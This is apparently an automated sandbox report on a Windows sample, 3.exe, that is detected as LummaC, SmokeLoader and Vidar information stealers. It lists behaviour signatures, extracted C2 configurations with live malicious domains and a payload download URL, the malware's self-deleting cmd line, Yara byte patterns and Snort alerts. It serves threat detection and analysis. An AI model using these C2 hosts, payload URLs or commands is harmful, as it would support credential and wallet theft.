Edit tour

Windows Analysis Report
3.exe

Overview

General Information

Sample name:	3.exe
Analysis ID:	1447653
MD5:	eda6e5a44657001108351760d2425c80
SHA1:	bff6e0250b689d1431e72f8cf070d115ba4720f9
SHA256:	7728eb47da1cbc7e34e79df27d3e9f47f0d5054baf0c9bfa3bb44ebafa9a6d6f
Tags:	exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected CryptOne packer

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected SmokeLoader

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Opens network shares

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

3.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\3.exe" MD5: EDA6E5A44657001108351760D2425C80)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

A247.exe (PID: 6204 cmdline: C:\Users\user\AppData\Local\Temp\A247.exe MD5: EA9DD1EAE2E521666D3F06382104EC10)

WerFault.exe (PID: 3836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 1548 MD5: C31336C1EFC2CCB44B4326EA793040F2)

5358.exe (PID: 4296 cmdline: C:\Users\user\AppData\Local\Temp\5358.exe MD5: AC1CC39DC3DF2AB7197EC22259A09E17)

kat2225.tmp (PID: 6716 cmdline: C:\Users\user\AppData\Local\Temp\kat2225.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)

cmd.exe (PID: 5276 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 5996 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

rcjjrra (PID: 3580 cmdline: C:\Users\user\AppData\Roaming\rcjjrra MD5: EDA6E5A44657001108351760D2425C80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x264:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x20df0:$s1: JohnDoe 0x20de8:$s2: HAL9TH
00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x664:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x66cb:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x664:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x264:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000009.00000002.3157954757.0000000000572000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x221f0:$s1: JohnDoe 0x221e8:$s2: HAL9TH
00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x75eb:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1150:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: A247.exe PID: 6204	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: A247.exe PID: 6204	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 5358.exe PID: 4296	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 5358.exe PID: 4296	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 5358.exe PID: 4296	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: kat2225.tmp PID: 6716	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: kat2225.tmp PID: 6716	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: kat2225.tmp PID: 6716	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.5358.exe.4387719.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.5358.exe.4387719.1.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x201f0:$s1: JohnDoe 0x201e8:$s2: HAL9TH
8.2.5358.exe.2590000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.5358.exe.2590000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x20df0:$s1: JohnDoe 0x20de8:$s2: HAL9TH
8.2.5358.exe.4387719.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.5358.exe.4387719.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x20df0:$s1: JohnDoe 0x20de8:$s2: HAL9TH
8.2.5358.exe.45b0000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.5358.exe.45b0000.2.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x20df0:$s1: JohnDoe 0x20de8:$s2: HAL9TH
8.2.5358.exe.45b0000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.5358.exe.45b0000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x221f0:$s1: JohnDoe 0x221e8:$s2: HAL9TH
8.2.5358.exe.2590000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.5358.exe.2590000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x201f0:$s1: JohnDoe 0x201e8:$s2: HAL9TH
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rcjjrra, CommandLine: C:\Users\user\AppData\Roaming\rcjjrra, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rcjjrra, NewProcessName: C:\Users\user\AppData\Roaming\rcjjrra, OriginalFileName: C:\Users\user\AppData\Roaming\rcjjrra, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\rcjjrra, ProcessId: 3580, ProcessName: rcjjrra

Snort Signatures

ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	05/26/24-10:30:28.747460
SID:	2052787
Source Port:	63577
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:33:44.583911
SID:	2039103
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:27.910020
SID:	2039103
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:33:10.602930
SID:	2039103
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:32:35.641693
SID:	2039103
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:22.667559
SID:	2039103
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:18.841635
SID:	2039103
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:32:54.137738
SID:	2039103
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:33:26.674969
SID:	2039103
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:25.176892
SID:	2039103
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:20.143672
SID:	2039103
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:30.459445
SID:	2039103
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:32:23.617804
SID:	2039103
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:33:31.550599
SID:	2039103
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:32:59.095133
SID:	2039103
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:32:40.871504
SID:	2039103
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:33:15.562340
SID:	2039103
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:17.597892
SID:	2039103
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:21.399810
SID:	2039103
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:54.355801
SID:	2039103
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:32:12.622814
SID:	2039103
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:33:50.615202
SID:	2039103
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:33:05.584329
SID:	2039103
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:59.974334
SID:	2039103
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:32:30.788438
SID:	2039103
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:29.219756
SID:	2039103
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:33:21.922977
SID:	2039103
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:32:18.038749
SID:	2039103
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:32:49.228874
SID:	2039103
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:31.722779
SID:	2039103
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 88.225.215.104

Timestamp:	05/26/24-10:33:38.557470
SID:	2039103
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	05/26/24-10:30:55.854761
SID:	2039103
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 3.exe

Avira: detected

Antivirus detection for URL or domain

Source: whispedwoodmoodsksl.shop	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/(	Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/_o5e	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/r	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/%%	Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\rcjjrra	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp

Found malware configuration

Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 5.3.A247.exe.7a0000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}

Multi AV Scanner detection for domain / URL

Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: dbfhns.in	Virustotal: Detection: 5%	Perma Link
Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: https://whispedwoodmoodsksl.shop/(	Virustotal: Detection: 15%	Perma Link
Source: https://65.109.242.59/s	Virustotal: Detection: 13%	Perma Link
Source: http://guteyr.cc/tmp/index.php	Virustotal: Detection: 12%	Perma Link
Source: https://65.109.242.59/r	Virustotal: Detection: 6%	Perma Link
Source: https://65.109.242.59/K	Virustotal: Detection: 6%	Perma Link
Source: http://45.129.96.86/file/update.exe	Virustotal: Detection: 20%	Perma Link
Source: https://65.109.242.59/O	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\A247.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\rcjjrra	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: 3.exe

Virustotal: Detection: 47%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\rcjjrra	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 3.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: boredimperissvieos.shop
